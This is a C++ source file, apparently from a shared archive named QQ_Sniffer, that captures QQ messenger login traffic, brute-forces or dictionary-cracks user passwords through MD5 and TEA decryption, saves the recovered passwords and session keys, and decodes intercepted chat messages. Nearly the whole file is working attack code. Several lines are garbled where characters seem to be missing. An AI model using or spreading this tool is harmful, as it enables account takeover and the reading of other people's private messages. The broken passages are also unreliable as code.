www.pudn.com > QQ_Sniffer.rar > myCrack.cpp
#include "stdafx.h"
#include "myCrack.h"
#include "myState.h"
#include "md5.h"
#include "mycrypt.h"
#include
#include
static char chfield [128];
void outputBinary ( const u_char * byteArray, const size_t byteArrayLen, FILE* pipe)
{
u_long offset;
int i, j, k;
fprintf( pipe, "binary data [ %lu bytes ] ----> \n", ( long unsigned int )byteArrayLen );
if ( byteArrayLen <= 0 )
{
return;
}
i = 0;
offset = 0;
for ( k = byteArrayLen / 16; k > 0; k--, offset += 16 )
{
fprintf( pipe, "%08X ", ( unsigned int )offset );
for ( j = 0; j < 16; j++, i++ )
{
if ( j == 8 )
{
fprintf( pipe, "-%02X", byteArray[i] );
}
else
{
fprintf( pipe, " %02X", byteArray[i] );
}
}
fprintf( pipe, " " );
i -= 16;
for ( j = 0; j < 16; j++, i++ )
{
/* if ( isprint( (int)byteArray[i] ) ) */
if ( ( byteArray[i] >= ' ' ) && ( byteArray[i] <= 255 ) )
{
fprintf( pipe, "%c", byteArray[i] );
}
else
{
fprintf( pipe, "." );
}
}
fprintf( pipe, "\n" );
} /* end of for */
k = byteArrayLen - i;
if ( k <= 0 )
{
return;
}
fprintf( pipe, "%08X ", ( unsigned int )offset );
for ( j = 0 ; j < k; j++, i++ )
{
if ( j == 8 )
{
fprintf( pipe, "-%02X", byteArray[i] );
}
else
{
fprintf( pipe, " %02X", byteArray[i] );
}
}
i -= k;
for ( j = 16 - k; j > 0; j-- )
{
fprintf( pipe, " " );
}
fprintf( pipe, " " );
for ( j = 0; j < k; j++, i++ )
{
if ( ( byteArray[i] >= ' ' ) && ( byteArray[i] <= 255 ) )
{
fprintf( pipe, "%c", byteArray[i] );
}
else
{
fprintf( pipe, "." );
}
}
fprintf( pipe, "\n" );
return;
} /* end of outputBinary */
int outputtext( const u_char* hh_plain_text, const size_t hh_len_plain, int direct, FILE* pipe )
{
int k, time;
if(direct == C2S)
k = 52;
else if(direct == S2C)
k = 64;
else
return 0;
if(hh_len_plain == 1 && hh_plain_text[0]==0 )
{
/* if(direct == C2S)
fprintf(pipe, "message sended!\n\n");
else if(direct == S2C)
fprintf(pipe, "message received!\n\n");
else
*/ return 0;
}
if(hh_len_plain < 60)
return 0;
if(hh_plain_text[k]!=1)
{
// outputBinary(hh_plain_text, hh_len_plain, pipe);
return 0;
}
fprintf(pipe, "Sender HH: %d\t\tReceiver HH: %d\n",
htonl(*((unsigned int*)&hh_plain_text[0])),
htonl(*((unsigned int*)&hh_plain_text[4])) );
// fprintf(pipe, "Sender HH version: %d.%d\n", hh_plain_text[8], hh_plain_text[9]);
// fprintf(pipe,"direct connection key is: \n");
// for(k=18; k<34; k++)
// fprintf(pipe, "%02x ",hh_plain_text[k]);
// time = htonl(*((unsigned int*)&hh_plain_text[34]));
// fprintf(pipe, "\nUnknown data: %d", time);
// if(direct == C2S)
time = htonl(*((unsigned int*)&hh_plain_text[k-14]));
/* else if(direct == S2C)
{
// outputBinary(hh_plain_text, hh_len_plain, pipe);
time = htonl(*((unsigned int*)&hh_plain_text[50]));
}
// time = htonl(*((unsigned int*)&hh_plain_text[direct==C2S?38:46]));
*/
fprintf(pipe, "Time: %s", ctime((time_t*)&time));
fprintf(pipe, "content of the message:\n");
for(k++;hh_plain_text[k];k++)
{
if(hh_plain_text[k]==0x14)
fprintf(pipe,"[%d]",hh_plain_text[++k]);
else
fprintf(pipe,"%c", hh_plain_text[k]);
}
fprintf(pipe, "\nFontsize: %d ",hh_plain_text[++k]&0x1f);
if(hh_plain_text[k]&0x20) fprintf(pipe,"B");
if(hh_plain_text[k]&0x40) fprintf(pipe,"I");
if(hh_plain_text[k]&0x80) fprintf(pipe,"U");
fprintf(pipe, "\tColor: RGB(%d,%d,%d)",
hh_plain_text[k+1],hh_plain_text[k+2],hh_plain_text[k+3]);
k+=4;
fprintf(pipe, "\tCharset:%d", hh_plain_text[++k]);
fprintf(pipe, "\tFont: ");
for(k++;ksender_ver = swapu16(h->sender_ver);
h->hh_cmd = swapu16(h->hh_cmd);
h->sq_no = swapu16(h->sq_no);
return h;
}
CMyCrack::CMyCrack()
{
memset(inikey1,0, sizeof(inikey1));
memset(inikey2,0, sizeof(inikey2));
memset(hh_plain_text, 0, sizeof(hh_plain_text));
hh_len_plain = 0;;
memset(pass_i, 0, sizeof(pass_i));
crkmod = 2;
memset(password, 0, sizeof(password));
pwwidth = 0;
}
CMyCrack::~CMyCrack()
{
}
void CMyCrack::setcrkmode(char mode)
{
crkmod = mode;
}
void CMyCrack::setaddr(struct tuple4 addr, u_char proto)
{
ip_addr = addr;
ip_proto = proto;
}
int CMyCrack::initial_table(int charfield)
{
unsigned int i,j,ret;
char chfield1 [] = "abcdefghijklmnopqrstuvwxyz";
char chfield2 [] = "0123456789";
char chfield4 [] = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
char chfield8 [] = "~_!@#$%^&*<>:+|";
for(i=0 ; i<128; i++)
chfield[i]=0;
for(i=0 ; iMAX_P_LEN? MAX_P_LEN: buflen;
memcpy(buf_copy, buffer, datalen);
pquh = (hh_udp_header*)(buf_copy);
if(pquh->begin_tag != HH_BEGIN_TAG || pquh->data[datalen] != HH_END_TAG)
{
fprintf( stderr, "what read is not valid login buffer\n" );
return 0;
}
//fprintf( stderr, "Found a valid hh packet, now analysing...\n");
//fprintf( stderr, "packet sender version is 0x%04x and cmdcode is 0x%04x\n",
// pquh->sender_ver, pquh->hh_cmd );
//return hh_analysis(pquh, datalen, pipe );
return 1;
}
int CMyCrack::buf_crack( char* buffile)
{
FILE* fp;
unsigned char buf[200];
unsigned int buflen;
if(buffile==NULL) return 0;
if((fp = fopen(buffile, "rb"))!=NULL)
{
buflen = fread(buf, 1, 200, fp);
fclose(fp);
parse_buffer( buf, buflen, stdout);
}
return 1;
}
u_int CMyCrack::validpass()
{
return 1;
}
int CMyCrack::hh_crack(char crkmode, unsigned char* data )
{
int i, working;
unsigned char digest[MAX_PASS_LEN];
i = 0;
working = 1;
FILE* dic = NULL;
if (crkmode == 0)
{
char* dictionary = NULL;
if(dictionary)
{
fprintf(stderr,"dictionary attack mode...\n");
dic = fopen(dictionary,"r");
if(!dic)
{
fprintf(stderr,"Can't open dictionary file %s, changing crack mode to 2\n", dictionary);
return 0;
}
working = update_pass_dic(dic);
}
else
{
return 0;
}
}
else
pwwidth = initial_table(crkmode);
fprintf(stderr,"brute-force attack mode ----- %d \n", crkmode);
while(working)
{
MD5String(password, (char*)digest);
if(simple_decrypt( data ,(unsigned long*)digest) )
{
fprintf(stdout,"cracked!\n" );
fprintf(stdout,"pass=%s\n", password);
fflush(stdout);
memcpy(inikey1, digest, LEN_TEA_KEY);
MD5_16((char*)inikey1, (char*)inikey2);
return 1;
}
MD5_16((char*)digest,(char*)digest);
if(simple_decrypt( data ,(unsigned long*)digest) )
{
fprintf(stdout,"cracked!\n" );
fprintf(stdout,"pass=%s\n", password);
fflush(stdout);
MD5String(password, (char*)inikey1);
memcpy(inikey2, digest, LEN_TEA_KEY);
return 1;
}
i++;
if(i>RECORD_GAP)
{
//record it.
fprintf(stdout, "pass %s trying...\n", password);
i=0;
}
if(crkmode == 0)
{
if (dic)
working = update_pass_dic(dic);
}
else
working = update_pass();
}
if((crkmode == 0) && dic)
{
fclose(dic);
fprintf(stderr,"dictionary attack completed!\n");
return 0;
}
return 0;
}
u_int CMyCrack::crack_hh_login( const u_char * data, const u_int len, void* reserved)
{
hh_login_data * pqld;
u_int datalen;
if(len%4)
return 0;
if(len%8) //C2S, has hh_number, len = 8*N+4
{
pqld = (hh_login_data *)data;
datalen = len - sizeof(u_int) - LEN_TEA_KEY;
if(decrypt_msg( pqld->data, datalen, (unsigned long *)pqld->key, hh_plain_text, (unsigned long *)&hh_len_plain) )
{
// fprintf( stderr, "decrypted OK\n");
if (hh_crack(HH_NUM_CRACK, hh_plain_text ) != 1)
{
if (hh_crack(HH_DIC_CRACK, hh_plain_text ) != 1)
{
if (hh_crack(HH_LOWER_CRACK, hh_plain_text ) != 1)
{
if (hh_crack(HH_UPPER_CRACK, hh_plain_text ) != 1)
{
return 0;
}
}
}
}
g_objState.FreeState(ip_addr, ip_proto);
hh_state * hhstate = new hh_state;
hhstate->addr = ip_addr;
hhstate->proto = ip_proto;
hhstate->hh_number = swapu32(pqld->hh_no);
memcpy(hhstate->hh_password, password, MAX_PASS_LEN);
hhstate->state = 1;
memcpy(hhstate->key1, inikey1, LEN_TEA_KEY);
memcpy(hhstate->key2, inikey2, LEN_TEA_KEY);
g_objState.AddState(hhstate);
//fprintf( stderr, "hh %d are trying to log in!\n\n", (u_int)hh_number);
return 1;
}
else
{
//fprintf( stderr, "decrypted failed!\n");
return 0;
}
}
else //S2C
{
hh_state * hhstate = g_objState.FindState(ip_addr, ip_proto);
if (!hhstate)
return 0;
//if ( decrypt_msg((unsigned char*) data, len, (unsigned long *)inikey1, hh_plain_text, (unsigned long *)&hh_len_plain) )
if ( decrypt_msg((unsigned char*) data, len, (unsigned long *)hhstate->key1, hh_plain_text, (unsigned long *)&hh_len_plain) )
{
//fprintf(stderr, "decrypted OK 1\n");
if(validpass())
{
memcpy(hhstate->key1, hh_plain_text + 1, LEN_TEA_KEY);
hhstate->state = 2;
outputBinary( hhstate->key1, LEN_TEA_KEY, stderr);
//outputBinary( workkey, LEN_TEA_KEY, stderr);
return 2;
}
}
else if ( decrypt_msg((unsigned char*)data, len, (unsigned long *)hhstate->key2, hh_plain_text, (unsigned long *)&hh_len_plain) )
{
//fprintf(stderr, "decrypted OK 2\n");
if(validpass())
{
fprintf(stderr, "We got a workkey for hh %d !\n", hhstate->hh_number);
memcpy(hhstate->key1, hh_plain_text + 1, LEN_TEA_KEY);
hhstate->state = 2;
u_int number = *(u_int *)(hh_plain_text+ LEN_TEA_KEY + 1);
int hh_number = swapu32(number);
outputBinary( hhstate->key1, LEN_TEA_KEY, stderr);
return 2;
}
}
else
{
fprintf(stderr, "decrypted failed! maybe wrong key provided!\n");
hh_len_plain = 0;
return 0;
}
return 0;
}
}